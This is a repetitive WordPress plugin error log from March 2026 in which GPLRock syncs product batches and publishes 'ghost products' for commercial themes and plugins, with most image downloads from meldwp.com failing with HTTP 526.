Image download failed for product ultraviolette-design-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:46 UTC] GPLRock: Image download failed for product ultraviolette-design-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultraviolette---design-portfolio-wordpress-theme-19123.webp for product ultraviolette-design-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:44:48 UTC] GPLRock WARNING: Image download failed for product ultraviolette-design-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ultraviolette---design-portfolio-wordpress-theme-19123.webp [08-Mar-2026 22:44:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultraviolette-design-portfolio-wordpress-theme [08-Mar-2026 22:44:48 UTC] GPLRock: Image download failed for product shoshin-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:50 UTC] GPLRock: Image download failed for product shoshin-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shoshin---digital-agency-wordpress-theme-4032.webp for product shoshin-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:44:53 UTC] GPLRock: Image download failed for product shoshin-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:55 UTC] GPLRock: Image download failed for product shoshin-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shoshin---digital-agency-wordpress-theme-4032.webp for product shoshin-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:44:57 UTC] GPLRock WARNING: Image download failed for product shoshin-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shoshin---digital-agency-wordpress-theme-4032.webp [08-Mar-2026 22:44:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shoshin-digital-agency-wordpress-theme [08-Mar-2026 22:44:57 UTC] GPLRock: Image download failed for product school-time-modern-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:00 UTC] GPLRock: Image download failed for product school-time-modern-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/school-time---modern-education-wordpress-theme-4186.webp for product school-time-modern-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:02 UTC] GPLRock: Image download failed for product school-time-modern-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:05 UTC] GPLRock: Image download failed for product school-time-modern-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/school-time---modern-education-wordpress-theme-4186.webp for product school-time-modern-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:07 UTC] GPLRock WARNING: Image download failed for product school-time-modern-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/school-time---modern-education-wordpress-theme-4186.webp [08-Mar-2026 22:45:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: school-time-modern-education-wordpress-theme [08-Mar-2026 22:45:07 UTC] GPLRock: Image download failed for product artcus-interior-designer-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:09 UTC] GPLRock: Image download failed for product artcus-interior-designer-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artcus---interior-designer--architecture-wordpress-theme-12609.webp for product artcus-interior-designer-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:12 UTC] GPLRock: Image download failed for product artcus-interior-designer-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:14 UTC] GPLRock: Image download failed for product artcus-interior-designer-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artcus---interior-designer--architecture-wordpress-theme-12609.webp for product artcus-interior-designer-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:16 UTC] GPLRock WARNING: Image download failed for product artcus-interior-designer-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artcus---interior-designer--architecture-wordpress-theme-12609.webp [08-Mar-2026 22:45:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artcus-interior-designer-architecture-wordpress-theme [08-Mar-2026 22:45:18 UTC] GPLRock: Image download failed for product pressmart-modern-elementor-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:20 UTC] GPLRock: Image download failed for product pressmart-modern-elementor-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pressmart---modern-elementor-woocommerce-wordpress-theme-17602.webp for product pressmart-modern-elementor-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:23 UTC] GPLRock: Image download failed for product pressmart-modern-elementor-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:25 UTC] GPLRock: Image download failed for product pressmart-modern-elementor-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pressmart---modern-elementor-woocommerce-wordpress-theme-17602.webp for product pressmart-modern-elementor-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:27 UTC] GPLRock WARNING: Image download failed for product pressmart-modern-elementor-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pressmart---modern-elementor-woocommerce-wordpress-theme-17602.webp [08-Mar-2026 22:45:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pressmart-modern-elementor-woocommerce-wordpress-theme [08-Mar-2026 22:45:27 UTC] GPLRock: Image download failed for product celik-furniture-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:30 UTC] GPLRock: Image download failed for product celik-furniture-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/celik---furniture-woocommerce-theme-5714.webp for product celik-furniture-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:32 UTC] GPLRock: Image download failed for product celik-furniture-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:34 UTC] GPLRock: Image download failed for product celik-furniture-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/celik---furniture-woocommerce-theme-5714.webp for product celik-furniture-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:36 UTC] GPLRock WARNING: Image download failed for product celik-furniture-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/celik---furniture-woocommerce-theme-5714.webp [08-Mar-2026 22:45:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: celik-furniture-woocommerce-theme [08-Mar-2026 22:45:38 UTC] GPLRock: Image downloaded successfully for product netube-viral-video-blog-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-662e524b.webp [08-Mar-2026 22:45:38 UTC] GPLRock: Using pre-downloaded image for product netube-viral-video-blog-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-662e524b.webp [08-Mar-2026 22:45:38 UTC] GPLRock: Ghost product published with image - Product ID: netube-viral-video-blog-magazine-wordpress-theme [08-Mar-2026 22:45:38 UTC] GPLRock: Image download failed for product grand-college-wordpress-theme-for-education (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:40 UTC] GPLRock: Image download failed for product grand-college-wordpress-theme-for-education (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grand-college---wordpress-theme-for-education-29815.webp for product grand-college-wordpress-theme-for-education after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:43 UTC] GPLRock: Image download failed for product grand-college-wordpress-theme-for-education (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:45 UTC] GPLRock: Image download failed for product grand-college-wordpress-theme-for-education (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grand-college---wordpress-theme-for-education-29815.webp for product grand-college-wordpress-theme-for-education after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:47 UTC] GPLRock WARNING: Image download failed for product grand-college-wordpress-theme-for-education. URL: https://meldwp.com/wp-content/uploads/grand-college---wordpress-theme-for-education-29815.webp [08-Mar-2026 22:45:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grand-college-wordpress-theme-for-education [08-Mar-2026 22:45:49 UTC] GPLRock: Image download failed for product winst-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:51 UTC] GPLRock: Image download failed for product winst-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/winst---one-page-portfolio-wordpress-theme-9989.webp for product winst-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:54 UTC] GPLRock: Image download failed for product winst-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:56 UTC] GPLRock: Image download failed for product winst-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:45:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/winst---one-page-portfolio-wordpress-theme-9989.webp for product winst-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:45:58 UTC] GPLRock WARNING: Image download failed for product winst-one-page-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/winst---one-page-portfolio-wordpress-theme-9989.webp [08-Mar-2026 22:45:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: winst-one-page-portfolio-wordpress-theme [08-Mar-2026 22:45:58 UTC] GPLRock: Image download failed for product forever-wedding-couple-planner-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:46:00 UTC] GPLRock: Image download failed for product forever-wedding-couple-planner-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:46:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/forever---wedding-couple--planner-agency-wordpress-theme-5886.webp for product forever-wedding-couple-planner-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:46:02 UTC] GPLRock: Image download failed for product forever-wedding-couple-planner-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:46:05 UTC] GPLRock: Image download failed for product forever-wedding-couple-planner-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:46:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/forever---wedding-couple--planner-agency-wordpress-theme-5886.webp for product forever-wedding-couple-planner-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:46:07 UTC] GPLRock WARNING: Image download failed for product forever-wedding-couple-planner-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/forever---wedding-couple--planner-agency-wordpress-theme-5886.webp [08-Mar-2026 22:46:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: forever-wedding-couple-planner-agency-wordpress-theme [08-Mar-2026 22:46:07 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2900, Total: 600/9737 [08-Mar-2026 22:46:08 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:46:09 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:46:10 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3000, Total: 700/9737 [08-Mar-2026 22:46:11 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:46:12 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:46:12 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:46:12 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3100, Total: 800/9737 [08-Mar-2026 22:46:13 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:46:21 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:49:26 UTC] GPLRock: Image download failed for product responsive-product-designer-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:49:28 UTC] GPLRock: Image download failed for product responsive-product-designer-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:49:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-product-designer-for-woocommerce-33003.webp for product responsive-product-designer-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:49:30 UTC] GPLRock: Image download failed for product responsive-product-designer-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:49:33 UTC] GPLRock: Image download failed for product responsive-product-designer-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:49:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-product-designer-for-woocommerce-33003.webp for product responsive-product-designer-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:49:35 UTC] GPLRock WARNING: Image download failed for product responsive-product-designer-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/responsive-product-designer-for-woocommerce-33003.webp [08-Mar-2026 22:49:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-product-designer-for-woocommerce [08-Mar-2026 22:49:35 UTC] GPLRock: Image download failed for product wp-e-commerce-carparts-filter-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:50:19 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3200, Total: 900/9737 [08-Mar-2026 22:50:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:50:20 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:50:21 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3300, Total: 1000/9737 [08-Mar-2026 22:50:22 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:50:24 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:50:24 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:50:24 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3400, Total: 1100/9737 [08-Mar-2026 22:50:25 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:50:29 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 23:53:13 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3600, Total: 1300/9737 [08-Mar-2026 23:53:14 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 23:53:16 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 23:53:16 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 23:53:16 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3700, Total: 1400/9737 [08-Mar-2026 23:53:17 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 23:53:17 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 00:06:19 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4000, Total: 1700/9737 [09-Mar-2026 00:06:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 00:06:24 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 00:06:25 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 00:06:25 UTC] GPLRock API Sync: Batch başlıyor - Offset: 4100, Total: 1800/9737 [09-Mar-2026 00:06:26 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 00:06:27 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 01:25:40 UTC] GPLRock: Image download failed for product web-slide-bootstrap-4-mega-menu-responsive (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:42 UTC] GPLRock: Image download failed for product web-slide-bootstrap-4-mega-menu-responsive (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/web-slide---bootstrap-4-mega-menu-responsive-498.webp for product web-slide-bootstrap-4-mega-menu-responsive after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:25:44 UTC] GPLRock: Image download failed for product web-slide-bootstrap-4-mega-menu-responsive (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:46 UTC] GPLRock: Image download failed for product web-slide-bootstrap-4-mega-menu-responsive (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/web-slide---bootstrap-4-mega-menu-responsive-498.webp for product web-slide-bootstrap-4-mega-menu-responsive after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:25:48 UTC] GPLRock WARNING: Image download failed for product web-slide-bootstrap-4-mega-menu-responsive. URL: https://meldwp.com/wp-content/uploads/web-slide---bootstrap-4-mega-menu-responsive-498.webp [09-Mar-2026 01:25:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: web-slide-bootstrap-4-mega-menu-responsive [09-Mar-2026 01:25:48 UTC] GPLRock: Image download failed for product inventory-management-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:51 UTC] GPLRock: Image download failed for product inventory-management-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inventory-management-module-for-perfex-crm-25820.webp for product inventory-management-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:25:55 UTC] GPLRock: Image download failed for product inventory-management-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:57 UTC] GPLRock: Image download failed for product inventory-management-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:25:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inventory-management-module-for-perfex-crm-25820.webp for product inventory-management-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:25:59 UTC] GPLRock WARNING: Image download failed for product inventory-management-module-for-perfex-crm. URL: https://meldwp.com/wp-content/uploads/inventory-management-module-for-perfex-crm-25820.webp [09-Mar-2026 01:25:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: inventory-management-module-for-perfex-crm [09-Mar-2026 01:26:00 UTC] GPLRock: Image download failed for product animated-stat-counter-number-showcase-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:02 UTC] GPLRock: Image download failed for product animated-stat-counter-number-showcase-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animated-stat-counter-number-showcase-plugin-for-wordpress-27230.webp for product animated-stat-counter-number-showcase-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:05 UTC] GPLRock: Image download failed for product animated-stat-counter-number-showcase-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:07 UTC] GPLRock: Image download failed for product animated-stat-counter-number-showcase-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animated-stat-counter-number-showcase-plugin-for-wordpress-27230.webp for product animated-stat-counter-number-showcase-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:10 UTC] GPLRock WARNING: Image download failed for product animated-stat-counter-number-showcase-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/animated-stat-counter-number-showcase-plugin-for-wordpress-27230.webp [09-Mar-2026 01:26:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: animated-stat-counter-number-showcase-plugin-for-wordpress [09-Mar-2026 01:26:10 UTC] GPLRock: Image downloaded successfully for product wordpress-pricing-tables-sliders-comparison-with-bonus-ecommerce-features-woocommerce-support (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df184c24.webp [09-Mar-2026 01:26:10 UTC] GPLRock: Using pre-downloaded image for product wordpress-pricing-tables-sliders-comparison-with-bonus-ecommerce-features-woocommerce-support: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df184c24.webp [09-Mar-2026 01:26:10 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-pricing-tables-sliders-comparison-with-bonus-ecommerce-features-woocommerce-support [09-Mar-2026 01:26:10 UTC] GPLRock: Image download failed for product page-scroll-animation-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:12 UTC] GPLRock: Image download failed for product page-scroll-animation-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/page-scroll-animation---wordpress-plugin-15200.webp for product page-scroll-animation-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:14 UTC] GPLRock: Image download failed for product page-scroll-animation-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:16 UTC] GPLRock: Image download failed for product page-scroll-animation-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/page-scroll-animation---wordpress-plugin-15200.webp for product page-scroll-animation-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:18 UTC] GPLRock WARNING: Image download failed for product page-scroll-animation-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/page-scroll-animation---wordpress-plugin-15200.webp [09-Mar-2026 01:26:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: page-scroll-animation-wordpress-plugin [09-Mar-2026 01:26:18 UTC] GPLRock: Image download failed for product events-importer-from-facebook-to-the-events-calendar-addon-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:21 UTC] GPLRock: Image download failed for product events-importer-from-facebook-to-the-events-calendar-addon-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/events-importer-from-facebook-to-the-events-calendar-addon---pro-18028.webp for product events-importer-from-facebook-to-the-events-calendar-addon-pro after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:23 UTC] GPLRock: Image download failed for product events-importer-from-facebook-to-the-events-calendar-addon-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:25 UTC] GPLRock: Image download failed for product events-importer-from-facebook-to-the-events-calendar-addon-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/events-importer-from-facebook-to-the-events-calendar-addon---pro-18028.webp for product events-importer-from-facebook-to-the-events-calendar-addon-pro after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:27 UTC] GPLRock WARNING: Image download failed for product events-importer-from-facebook-to-the-events-calendar-addon-pro. URL: https://meldwp.com/wp-content/uploads/events-importer-from-facebook-to-the-events-calendar-addon---pro-18028.webp [09-Mar-2026 01:26:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: events-importer-from-facebook-to-the-events-calendar-addon-pro [09-Mar-2026 01:26:27 UTC] GPLRock: Image download failed for product bs-input-social-login-and-register-popup-with-shortcode-site-locker (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:29 UTC] GPLRock: Image download failed for product bs-input-social-login-and-register-popup-with-shortcode-site-locker (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bs-input---social-login-and-register-popup-with-shortcode--site-locker-20299.webp for product bs-input-social-login-and-register-popup-with-shortcode-site-locker after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:32 UTC] GPLRock: Image download failed for product bs-input-social-login-and-register-popup-with-shortcode-site-locker (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:34 UTC] GPLRock: Image download failed for product bs-input-social-login-and-register-popup-with-shortcode-site-locker (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bs-input---social-login-and-register-popup-with-shortcode--site-locker-20299.webp for product bs-input-social-login-and-register-popup-with-shortcode-site-locker after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:36 UTC] GPLRock WARNING: Image download failed for product bs-input-social-login-and-register-popup-with-shortcode-site-locker. URL: https://meldwp.com/wp-content/uploads/bs-input---social-login-and-register-popup-with-shortcode--site-locker-20299.webp [09-Mar-2026 01:26:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bs-input-social-login-and-register-popup-with-shortcode-site-locker [09-Mar-2026 01:26:43 UTC] GPLRock: Image download failed for product woocommerce-aliexpress-dropship (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:45 UTC] GPLRock: Image download failed for product woocommerce-aliexpress-dropship (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-aliexpress-dropship-26412.webp for product woocommerce-aliexpress-dropship after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:48 UTC] GPLRock: Image download failed for product woocommerce-aliexpress-dropship (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:50 UTC] GPLRock: Image download failed for product woocommerce-aliexpress-dropship (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-aliexpress-dropship-26412.webp for product woocommerce-aliexpress-dropship after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 01:26:52 UTC] GPLRock WARNING: Image download failed for product woocommerce-aliexpress-dropship. URL: https://meldwp.com/wp-content/uploads/woocommerce-aliexpress-dropship-26412.webp [09-Mar-2026 01:26:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-aliexpress-dropship [09-Mar-2026 01:26:53 UTC] GPLRock: Image download failed for product foodbook-automatic-order-invoice-printing-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 01:26:55 